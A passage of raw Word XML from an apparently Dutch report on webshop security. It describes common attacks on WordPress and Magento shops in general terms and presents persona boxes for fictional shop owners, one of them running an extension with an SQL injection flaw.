      <w:r w:rsidR="008A79F1">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve"> webshops op tijd te </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A79F1">
        <w:t>patchen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A79F1">
        <w:t xml:space="preserve">. In de meeste gevallen gaat het hier dan om webshops die zelf door de eigenaar worden onderhouden, bij S5 wordt het wel gedaan. Webshop eigenaren investeren niet graag in web security om de volgende redenen: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC36B4" w14:textId="77777777" w:rsidR="008A79F1" w:rsidRDefault="008A79F1" w:rsidP="008A79F1">
      <w:r>
        <w:t>Het installeren van patches kan een complexe karwij zijn, voor een gemiddelde gebruiker. Dit kan betekenen dat er een expert voor ingehuurd moet worden. Webshop eigenaren kiezen liever een grote risico over het inhuren van een ontwikkelaar die de security van hun websites verbeterd en onderhoud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5BA4A2" w14:textId="77777777" w:rsidR="008A79F1" w:rsidRDefault="008A79F1" w:rsidP="008A79F1">
      <w:r>
        <w:t>De vier meest voorkomende securityproblemen zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC79D77" w14:textId="77777777" w:rsidR="008A79F1" w:rsidRDefault="008A79F1" w:rsidP="008A79F1">
      <w:r>
        <w:t xml:space="preserve">Brute force aanvallen – dit is een trial </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> error methode waarbij de hacker meerdere usernames en password combinatie uitprobeert. Meestal wordt dit gedaan met een server-side </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> taal als </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pyhton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F0A410" w14:textId="77777777" w:rsidR="008A79F1" w:rsidRDefault="008A79F1" w:rsidP="008A79F1">
      <w:r>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Inclusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – bestand inclusie gebeurd wanneer kwetsbare code wordt misbruikt om bestanden in te laden wat aanvallers toegang kunnen geven tot jouw website. Dit is een gangbare manier voor hackers om toegang te krijgen tot een gebruikersaccount waarop zij volledige administratie rechten hebben.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2DEBE" w14:textId="77777777" w:rsidR="008A79F1" w:rsidRDefault="008A79F1" w:rsidP="008A79F1">
      <w:r>
        <w:t xml:space="preserve">SQL Injecties – database injectie zijn een veel voorkomende aanval die hackers uitvoeren om toegang te krijgen tot de database. Hackers gebruiken de database taal SQL om injecties uit te voeren op webpagina’s die er niet beveiligd tegen zijn. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> heeft hier ook last omdat derde partijen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>plugin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kunnen ontwikkelen voor de CMS. Als deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>plugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> niet goed beveiligd zijn tegen SQL-injecties dan geeft dat hackers de kans om een data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>breach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> uit te voeren op een database. Dit betekent dat hackers nieuwe gebruikers kunnen toevoegen met administratie rechten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7EC33" w14:textId="77777777" w:rsidR="008A79F1" w:rsidRDefault="008A79F1" w:rsidP="008A79F1">
      <w:r>
        <w:t xml:space="preserve">Cross site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -  met de injectie van javascript code kan een hacker veel schade toe richten op de front-end van een website. Script kunnen geïnjecteerd worden die gegevens van niet vermoedende gebruikers onderscheppen. Een scripts worden via formulieren op een website toegevoegd aan de broncode en meegestuurd bij het verzenden van het formulier. De server herkent het als javascript code en runt het. Zoals bij SQL-injectie zitten er veel kwetsbaarheden in extensies die ontwikkeld zijn door derde partijen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED3DD1" w14:textId="7CCFCD7E" w:rsidR="008A79F1" w:rsidRPr="000F1B01" w:rsidRDefault="00841194" w:rsidP="005A415F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc491022056"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68237A69" wp14:editId="0654A246">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-73025</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>362585</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5690235" cy="3799840"/>
                <wp:effectExtent l="0" t="0" r="24765" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8" name="Text Box 8"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5690235" cy="37998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B65D6EB" w14:textId="134D1E90" w:rsidR="00CE4BB5" w:rsidRPr="00510B9E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Eigenaar</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Karel Jan Smit</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0B0DC7CB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Webshop</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>outdoorsshop</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="2AB67EAE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>URL</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>: www.outdoorsshop.nl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="36269B13" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Platform</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00841194">
                              <w:t>WordPress</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="0217F4C8" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Markt</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:t>: Kleding, survival</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6C165E11" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Aantal</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>klanten/accounts</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:t xml:space="preserve">: 10.000 </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3123A1F9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Aantal</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>producten</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:t>: 3000</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3F099850" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Betaalmiddel</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00841194">
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00841194">
                              <w:t>Ideal</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00841194">
                              <w:t>/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00841194">
                              <w:t>paypal</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00841194">
                              <w:t>/creditcard</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6E24FA25" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:u w:val="single"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>Probleem</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1B9D496A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00841194">
                              <w:t>De webshop gebruikt een extensie met een SQL-injectie kwetsbaarheid. De eigenaar heft hier geen kennis over.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7C16379A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:u w:val="single"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00841194">
                              <w:rPr>
                                <w:b/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Risico </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7B6015D0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:r w:rsidRPr="00841194">
                              <w:t xml:space="preserve">Hackers kunnen klantengegevens stelen door een </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00841194">
                              <w:t>databreach</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00841194">
                              <w:t xml:space="preserve"> uit te voeren op de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37A69" id="Text Box 8" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;margin-left:-5.75pt;margin-top:28.55pt;width:448.05pt;height:299.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6Xg3YkCAACJBQAADgAAAGRycy9lMm9Eb2MueG1srFTfT9swEH6ftP/B8vtIWwqjFSnqQEyTEKDB&#10;xLPr2DSa7fPsa5Pur9/ZSUrFeGHaS2Lf7/vu851ftNawrQqxBlfy8dGIM+UkVLV7LvmPx+tPZ5xF&#10;FK4SBpwq+U5FfrH4+OG88XM1gTWYSgVGQVycN77ka0Q/L4oo18qKeAReOVJqCFYgXcNzUQXRUHRr&#10;islodFo0ECofQKoYSXrVKfkix9daSbzTOipkpuRUG+ZvyN9V+haLczF/DsKva9mXIf6hCitqR0n3&#10;oa4ECrYJ9V+hbC0DRNB4JMEWoHUtVe6BuhmPXnXzsBZe5V4InOj3MMX/F1bebu8Dq6uS06CcsDSi&#10;R9Ui+wItO0voND7OyejBkxm2JKYpD/JIwtR0q4NNf2qHkZ5w3u2xTcEkCU9OZ6PJ8QlnknTHn2ez&#10;s2lGv3hx9yHiVwWWpUPJAw0vYyq2NxGpFDIdTFI2B9e1MXmAxiVBBFNXSZYviUHq0gS2FTR7bHPV&#10;FOLAim6dp8pM6bOkjrvO8gl3RqWAxn1XmpDKDb6RQUipHA5ZsnWy0lTPexx7++TaVfUe571HzgwO&#10;9862dhAymvlpvQBT/RxK1p094XzQdzpiu2ozRabD4FdQ7YgPAbr3FL28rmlmNyLivQj0gIgCtBTw&#10;jj7aQFNy6E+crSH8fkue7InXpOWsoQdZ8vhrI4LizHxzxPjZeEqMYZgv05PPE7qEQ83qUOM29hJo&#10;7mNaP17mY7JHMxx1APtEu2OZspJKOEm5iSjD8RK7NUG7R6rlMhvRm/UCb9yDlyl0Qjkx8rF9EsH3&#10;tEVi/C0MT1fMX7G3s02eDpYbBF1naiecO1R7/Om9Z8b3uyktlMN7tnrZoIs/AAAA//8DAFBLAwQU&#10;AAYACAAAACEA2hrvaeIAAAAKAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQWvCQBCF74X+h2UKvekm&#10;pRtDmom0ilDEHtQiPa7JNAnNzobsqvHfd3uyx+F9vPdNPh9NJ840uNYyQjyNQBCXtmq5RvjcryYp&#10;COc1V7qzTAhXcjAv7u9ynVX2wls673wtQgm7TCM03veZlK5syGg3tT1xyL7tYLQP51DLatCXUG46&#10;+RRFiTS65bDQ6J4WDZU/u5NBeN9f19vZ4iMx67fl1+Yg3WG13CA+PoyvLyA8jf4Gw59+UIciOB3t&#10;iSsnOoRJHKuAIqhZDCIAafqcgDgiJEopkEUu/79Q/AIAAP//AwBQSwECLQAUAAYACAAAACEA5JnD&#10;wPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAI&#10;AAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAI&#10;AAAAIQAfpeDdiQIAAIkFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQDaGu9p4gAAAAoBAAAPAAAAAAAAAAAAAAAAAOEEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAA8AUAAAAA&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5B65D6EB" w14:textId="134D1E90" w:rsidR="00CE4BB5" w:rsidRPr="00510B9E" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Eigenaar</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Karel Jan Smit</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0B0DC7CB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Webshop</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>outdoorsshop</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="2AB67EAE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>URL</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>: www.outdoorsshop.nl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="36269B13" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Platform</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00841194">
                        <w:t>WordPress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="0217F4C8" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Markt</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:t>: Kleding, survival</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6C165E11" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Aantal</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>klanten/accounts</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:t xml:space="preserve">: 10.000 </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3123A1F9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Aantal</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>producten</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:t>: 3000</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3F099850" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Betaalmiddel</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00841194">
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00841194">
                        <w:t>Ideal</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00841194">
                        <w:t>/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00841194">
                        <w:t>paypal</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00841194">
                        <w:t>/creditcard</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6E24FA25" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>Probleem</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1B9D496A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00841194">
                        <w:t>De webshop gebruikt een extensie met een SQL-injectie kwetsbaarheid. De eigenaar heft hier geen kennis over.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7C16379A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00841194">
                        <w:rPr>
                          <w:b/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Risico </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7B6015D0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00841194" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                      <w:r w:rsidRPr="00841194">
                        <w:t xml:space="preserve">Hackers kunnen klantengegevens stelen door een </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00841194">
                        <w:t>databreach</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00841194">
                        <w:t xml:space="preserve"> uit te voeren op de database.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FE7016">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>2.2.2</w:t>
      </w:r>
      <w:r w:rsidR="007E2578">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Persona</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="0CDC0A72" w14:textId="78013490" w:rsidR="00736E76" w:rsidRPr="000F1B01" w:rsidRDefault="00217153" w:rsidP="00736E76">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32FAA288" wp14:editId="2FF91C41">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-70485</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4147185</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5715000" cy="4142740"/>
                <wp:effectExtent l="0" t="0" r="25400" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="9" name="Text Box 9"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5715000" cy="41427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108C771" w14:textId="6BDE93A2" w:rsidR="00CE4BB5" w:rsidRPr="00E06AC7" w:rsidRDefault="00CE4BB5" w:rsidP="008A79F1">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Eigenaar</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
